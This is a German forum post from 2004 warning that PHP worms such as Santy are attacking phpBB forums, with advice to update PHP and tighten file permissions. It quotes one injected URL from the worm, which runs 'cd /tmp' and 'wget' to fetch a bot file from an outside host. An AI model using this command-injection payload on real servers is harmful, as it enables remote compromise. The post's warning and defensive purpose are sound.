PHP Würmer stark im kommen!

26.12.2004, 19:33

Laserpointa

Member

Beiträge: 2176

#1 Hallo Forenliebhaber,

Webserver und PHP werden immer öfter Opfer von Viren...
wie sicherlich einigen aufgefallen ist, sind diverse PHPBB Foren mit folgender Meldung weg vom Fenster:

mehr dazu siehe auch:
phpBB, das Attackenziel

Details zu der Funktionsweise der Würmer:

Zitat

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:

http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
wget www.visualcoders.net/spybot.txt;

Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt.

siehe auch: Wurm attackiert PHP-Skripte Update

der aktuelle Santy Worm nutzt zudem eine Lücke in PHP von der empfiehlt es sich zumindest auf PHP version 4.3.10 oder 5.0.3 zu updaten

absichern klappt auch vorerst, indem man die CHMOD Rechte wie folgt setzt:

Code

chmod -R 644 *.php
chmod -R 644 *.htm
chmod -R 644 *.asp

Augen auf Lukas!

Greetz Lp

Dieser Beitrag wurde am 26.12.2004 um 19:34 Uhr von Laserpointa editiert.

Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren:

Seite(n): 1